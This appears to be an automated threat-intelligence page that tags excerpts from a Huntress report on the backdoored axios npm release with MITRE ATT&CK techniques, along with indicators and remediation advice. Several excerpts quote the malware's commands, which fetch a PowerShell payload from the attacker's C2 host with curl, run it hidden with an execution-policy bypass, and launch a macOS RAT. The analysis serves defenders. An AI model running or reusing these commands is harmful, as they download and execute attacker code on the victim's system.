TTPwire Vol. 1 · MITRE ATT&CK · Tagged


Huntress

Supply Chain Compromise of axios npm Package

2026-03-31

ATT&CK techniques detected

31 predictions
T1195.001 Compromise Software Dependencies and Development Tools
99%
“…ers and the npm security team could respond. The compromised packages were removed from npm approximately three hours later, but the damage was already done. Within our partner base, Huntress observed at least 135 endpoints across all operating systems contacting the attacker'…”
T1195.001 Compromise Software Dependencies and Development Tools
99%
“, regardless of OIDC configuration. The real maintainer later stated in GitHub issue #10604: "I'm trying to get support to understand how this even happened. I have 2FA/MFA on practically everything." The exact method of token compromise remains undetermined. Pre-staging t…”
T1071.001 Web Protocols
98%
“…st.github.com/johnhammond/96575799bd87ae64cddbc55634a6d32d Cross-platform RAT comparison: all three platform variants share an identical C2 protocol and command vocabulary, confirming they originate from the same threat actor and development framework: all variants use …”
T1195.001 Compromise Software Dependencies and Development Tools
98%
“…er account (jasonsaayman) and manually published two backdoored releases: [email protected] (tagged latest) and [email protected] (tagged legacy). These versions introduced a phantom dependency -- [email protected]... a package that had not existed before that day…”
T1195.001 Compromise Software Dependencies and Development Tools
98%
“to follow the remediation guidance outlined below, including rotating all credentials and rebuilding affected systems, as the RAT's capabilities for credential theft and data exfiltration mean the full scope of compromise may not be immediately apparent. ------------…”
T1059.001 PowerShell
94%
“\wt.exe → cmd.exe /c curl -s -X POST -d "packages.npm.org/product1" "http://sfrclak[.]com:8000/6202033" > %TEMP%\6202033.ps1 → %PROGRAMDATA%\wt.exe -w hidden -ep bypass -file %TEMP%\6202033.ps1 → deletes 6202033.ps1 → deletes 6202033.…”
T1195.001 Compromise Software Dependencies and Development Tools
93%
“exe → curl (POST to C2) → writes payload → 6202033.ps1 → executes via wt.exe (hidden, bypass) → deletes payload. At 10:38 PM, the SOC confirmed the attack was broader than initially appeared. Jordan Sexton noted one machine appeared to be hit via a yarn datadog package. Mi…”
T1059.001 PowerShell
92%
“…rclak[.]com. He identified the persistence mechanism (MicrosoftUpdate registry key → system.bat) and noted that one instance had been blocked by Defender. At 10:00 PM, Chad Hudson identified the evasion technique: "wt.exe is just Windows Terminal — being used as a po…”
T1204.002 Malicious File
90%
“Notably, the calltan[.]com domain has been linked back to a binary recently used by DPRK actors by researchers at Volexity. While the exact motivation behind the attack remains unclear, multiple lines of evidence now point to North Korean state-sponsored activity. Other rese…”
T1195.001 Compromise Software Dependencies and Development Tools
88%
“Supply Chain Compromise of axios npm Package. Note: This rapid response article has been written with AI assistance. Acknowledgments: Special thanks to Jevon Ang, Michael Elford, Jordan Sexton, Armelle French, Stephanie Fairless, Juzzy Allen, Ryan Dowd, Chad Hudson, Lindon Wass,…”
T1587 Develop Capabilities
88%
“: - macOS: /Library/Caches/com.apple.act.mond - Windows: %PROGRAMDATA%\wt.exe, short-lived temp scripts, and the MicrosoftUpdate registry persistence - Linux: /tmp/ld.py and related Python execution chains - process trees consistent with node → cmd/cscript…”
T1195.001 Compromise Software Dependencies and Development Tools
86%
“.73 on port 8000. Immediate remediation - Pin to safe versions immediately: - npm install [email protected] (for 1.x users) - npm install [email protected] (for 0.x users) - Add overrides to prevent transitive resolution: {"overrides": {"axios": "1.14.0"…”
T1587 Develop Capabilities
84%
“to follow the remediation guidance outlined below, including rotating all credentials and rebuilding affected systems, as the RAT's capabilities for credential theft and data exfiltration mean the full scope of compromise may not be immediately apparent. ------------…”
T1195.001 Compromise Software Dependencies and Development Tools
83%
“: - macOS: /Library/Caches/com.apple.act.mond - Windows: %PROGRAMDATA%\wt.exe, short-lived temp scripts, and the MicrosoftUpdate registry persistence - Linux: /tmp/ld.py and related Python execution chains - process trees consistent with node → cmd/cscript…”
T1587 Develop Capabilities
80%
“…er account (jasonsaayman) and manually published two backdoored releases: [email protected] (tagged latest) and [email protected] (tagged legacy). These versions introduced a phantom dependency -- [email protected]... a package that had not existed before that day…”
T1587 Develop Capabilities
75%
“.73 on port 8000. Immediate remediation - Pin to safe versions immediately: - npm install [email protected] (for 1.x users) - npm install [email protected] (for 0.x users) - Add overrides to prevent transitive resolution: {"overrides": {"axios": "1.14.0"…”
T1553.001 Gatekeeper Bypass
73%
“zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak[.]com:8000/6202033 &" The macOS RAT is a compiled C++ binary using the nlohmann/json library and libcurl. It provides the same command vocabulary as the Windows variant (kill, peinject, runscript…”
T1587 Develop Capabilities
71%
“, regardless of OIDC configuration. The real maintainer later stated in GitHub issue #10604: "I'm trying to get support to understand how this even happened. I have 2FA/MFA on practically everything." The exact method of token compromise remains undetermined. Pre-staging t…”
T1204.002 Malicious File
71%
“/df0e06df00e993e7917436d0f73df626 macOS tradecraft: on macOS, the dropper writes an AppleScript to a temporary file, which uses curl to download a Mach-O universal binary (supporting both x86_64 and arm64) from the C2 with the POST body packages.npm.org/product0. The bi…”
T1204.002 Malicious File
66%
“…e to %PROGRAMDATA%\wt.exe, then downloads and executes a PowerShell RAT - Linux: downloads a Python RAT script to /tmp/ld.py and executes it. After payload delivery, setup.js performs three anti-forensics operations: - deletes itself (setup.js) - deletes package…”
T1195.001 Compromise Software Dependencies and Development Tools
63%
“.11.206.73 - Port: 8000 - Clean npm cache: npm cache clean --force. Long-term hardening - Always commit lockfiles and use npm ci instead of npm install in CI/CD - Set npm config set min-release-age 3 to enforce a 48-72 hour quarantine on new package versions - Use…”
T1587 Develop Capabilities
56%
“…ers and the npm security team could respond. The compromised packages were removed from npm approximately three hours later, but the damage was already done. Within our partner base, Huntress observed at least 135 endpoints across all operating systems contacting the attacker'…”
T1195.002 Compromise Software Supply Chain
55%
“Supply Chain Compromise of axios npm Package. Note: This rapid response article has been written with AI assistance. Acknowledgments: Special thanks to Jevon Ang, Michael Elford, Jordan Sexton, Armelle French, Stephanie Fairless, Juzzy Allen, Ryan Dowd, Chad Hudson, Lindon Wass,…”
T1587 Develop Capabilities
53%
“.11.206.73 - Port: 8000 - Clean npm cache: npm cache clean --force. Long-term hardening - Always commit lockfiles and use npm ci instead of npm install in CI/CD - Set npm config set min-release-age 3 to enforce a 48-72 hour quarantine on new package versions - Use…”
T1055.001 Dynamic-link Library Injection
53%
“zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak[.]com:8000/6202033 &" The macOS RAT is a compiled C++ binary using the nlohmann/json library and libcurl. It provides the same command vocabulary as the Windows variant (kill, peinject, runscript…”
T1195.001 Compromise Software Dependencies and Development Tools
49%
“package-lock.json, yarn.lock, pnpm-lock.yaml) for: - any version of plain-crypto-js 2. Check for the malicious dependency directory: ls node_modules/plain-crypto-js 2>/dev/null && echo "potentially affected" The directory presence is sufficient evide…”
T1195 Supply Chain Compromise
46%
“Supply Chain Compromise of axios npm Package. Note: This rapid response article has been written with AI assistance. Acknowledgments: Special thanks to Jevon Ang, Michael Elford, Jordan Sexton, Armelle French, Stephanie Fairless, Juzzy Allen, Ryan Dowd, Chad Hudson, Lindon Wass,…”
T1557.001 Name Resolution Poisoning and SMB Relay
45%
“\wt.exe → cmd.exe /c curl -s -X POST -d "packages.npm.org/product1" "http://sfrclak[.]com:8000/6202033" > %TEMP%\6202033.ps1 → %PROGRAMDATA%\wt.exe -w hidden -ep bypass -file %TEMP%\6202033.ps1 → deletes 6202033.ps1 → deletes 6202033.…”
T1195.002 Compromise Software Supply Chain
43%
“…er account (jasonsaayman) and manually published two backdoored releases: [email protected] (tagged latest) and [email protected] (tagged legacy). These versions introduced a phantom dependency -- [email protected]... a package that had not existed before that day…”
T1195.002 Compromise Software Supply Chain
39%
“to follow the remediation guidance outlined below, including rotating all credentials and rebuilding affected systems, as the RAT's capabilities for credential theft and data exfiltration mean the full scope of compromise may not be immediately apparent. ------------…”
T1195.002 Compromise Software Supply Chain
37%
“exe → curl (POST to C2) → writes payload → 6202033.ps1 → executes via wt.exe (hidden, bypass) → deletes payload. At 10:38 PM, the SOC confirmed the attack was broader than initially appeared. Jordan Sexton noted one machine appeared to be hit via a yarn datadog package. Mi…”

Summary

An npm supply chain attack struck the ubiquitous open-source axios library, and Huntress has observed over a hundred affected devices.